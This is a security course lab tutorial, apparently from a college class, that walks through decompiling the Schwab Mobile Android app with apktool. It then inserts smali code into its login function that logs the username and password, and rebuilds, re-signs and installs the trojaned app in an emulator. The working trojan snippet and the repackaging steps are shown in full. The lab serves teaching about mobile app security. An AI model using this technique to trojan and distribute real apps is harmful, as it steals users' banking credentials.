Decompiling and Trojaning an Android App with Smali Code

Don't Be Evil

This is a nasty thing to do. Only distribute your trojaned apps in controlled test environments!

Please be responsible in how you use this information! If you commit crimes, I won't be able to save you.

What You Need for This Project


We'll take an Android app and modify it to steal passwords.

This version just puts the passwords in the log, which is easy but not very dangerous.

A later project will post the stolen passwords on the Internet, which is a lot scarier.

Installing a Real App on the Emulated Phone

Launch Genymotion. Open the Google Play store and install Schwab Mobile, as shown below.

Finding ADB

On your host machine, open a Terminal or Command Prompt window.

Execute these commands, changing the path in the first command to your correct SDK path.

Note: To find your SDK path, open Android Studio and click Tools, Android, "SDK Manager".

Here are common examples of SDK paths:

NOTE: If you are using Windows, remove the "./" before "adb".

cd /Users/sambowne/Library/Android/sdk

cd platform-tools

./adb devices -l

Note that the last character is a lower case L, not the numeral one.

You should see a device listed, as shown below.


If Genymotion is not running, try these troubleshooting steps.
  • Make sure the Genymotion device is running and connected to the Internet. Open the Web browser and see if you can view Web pages.
  • Try issuing these commands:
    ./adb kill-server

    ./adb start-server

  • Find the devices IP adress in Settings, Wi-Fi and connect to it with this command, replacing the IP address with the correct address in Genymotion
    ./adb connect

Pulling the APK File from the Android Emulator

Working in your sdk/platform-tools directory, execute these comands to pull the APK file from the emulator. If you are using another app, you will have to modify these commands accordingly.
./adb shell pm list packages | grep wab

./adb shell pm path

./adb pull /data/app/

Move the APK file to some convient directory to work in, such as Downloads.

Disassembling an APK with apktool

If you are using Kali Linux, you already have apktool.

Otherwise, go to

Download the latest version. When I did it on 2-1-15, it was "apktool_2.0.0rc3.jar".

Save the file in the same folder you used for the APK file, such as Downloads.

Open a Command Prompt or Terminal.

Change directory to the location you placed the downloaded file and open it with java, as shown below.

cd Downloads

java -jar apktool_2.0.0rc3.jar d

Messages appear as apktool disassembles the app, as shown below.

Exploring the Smali Code

After decoding, the Dalvik bytecode appears in a folder named "", in a subfolder names "smali". There are hundreds of files in many directories here. Notice that Schwab doesn't use any obfuscation at all--all the files and folders have readable names. They don't even bother to use the free "ProGuard" tool built into Android Studio to protect their code.

Finding Interesting Code with Grep

Start in the directory containing your APK file, such as Downloads.

Execute these commands:


grep -r username smali | more

This searches for the string "username" in the smali code.

One place it's found is in the SessionManagementService.smali file, as shown below.

Search Terms

When trojaning financial apps, I found that these terms worked well.

I usually search with "grep -ir" to be case insensitive and recursive.

Viewing Smali Code

Open Finder or Windows Explorer and navigate to your Downloads folder.

Navigate to the SessionManagementService.smali file and open it in a text editor.

Find the "performLogIn" function, as shown below. This function has two parameters that look interesting: p2 and p3.

To demonstrate the vulnerability, we'll put the username and password into the Android log. That is a famously insecure place to put them, because any app on the device can see them.

To do that, add this code to the file, as shown below.

const-string v0, "TROJAN STEALING USERNAME:" 
invoke-static {v0, p2}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I 
const-string v0, "TROJAN STEALING PASSWORD:" 
invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I 
Modify the file to steal the username and password, as shown below.

Save the modified file.

Rebuilding the App

Now we need to rebuild the APK file from the modified smali code. This will create a "dist" subdirectory containing an APK file.

The easiest way to do that is to start from the decompiled app's home directory, which is where you left off after performing the "grep" command.

In a Terminal or Command Prompt, execute this command:

java -jar ../apktool_2.0.0rc3.jar b .

Re-Signing the APK

Since the code has changed, the old signature is invalid. We must sign it again.

To do that, we'll use the "jarsigner" tool, part of the Jave Development Kit.

In a Terminal or Command Prompt, execute this command.

You will have to adjust the path after "-keystore" match the location of your signing certificate.

I recommend that you copy your signing certificate to the Downloads folder to make this easier.

The last parameter is your key's Alias.

Execute this command:

jarsigner -keystore ../p9cert.jks dist/* proj9key
When you are prompted to, enter the key store password you chose earlier.


If you see "jarsigner not found", you are probably using Windows. The Java installer does not work and you need to set two environment variables manually.

Click Start, Computer.

Navigate to C:\Program Files\java and find out the full path to your jdk folder.

It will be something like C:\Program Files\Java\jdk1.7.0_75

Now execute this command at an Administrator command prompt, with the correct jdk version:

set JAVA_HOME="C:\Program Files\Java\jdk1.7.0_75"
You also need to add this path to the PATH environment variable.

To do that, click Start, right-click Computer, click Properties, "Advanced System Settings", "Environment Variables".

Ensure that PATH is selected, and click Edit....

At the end of the path, insert this line, with the correct jdk version:

;C:\Program Files\Java\jdk1.7.0_75\bin
Then log out and log in again.

Installing the Modified App

Drop the APK file from the dist subdirectory onto your Genymotion Android device and install it.

A box tells you it must uninstall the expsting app first. Click OK.

Monitoring the Log

From the sdk/platform-tools directory, execute this command:
./adb logcat
A lot of messages scroll by. To focus on messages that came from the trojan code, press Ctrl+C to stop the running logcat and execute this command:
./adb logcat | grep TROJAN

Entering Data into the Trojaned App

The app launches. In the "What was new" box, click Close.

The Schwab app main window appears, as shown below.

In the top left, click the three-line icon just to the left of the blue "charles SCHWAB" logo.

Click "Log in".

Enter a fake credentials, as shown below. Click "Log in".

Viewing the Stolen Data

Your Terminal window should show the stolen data, as shown below.


How to unpack / pack an APK file

Dancing with dalvik

ExploitMe Mobile Android Labs

Posted 6-13-15 by Sam Bowne
Modified 7-12-15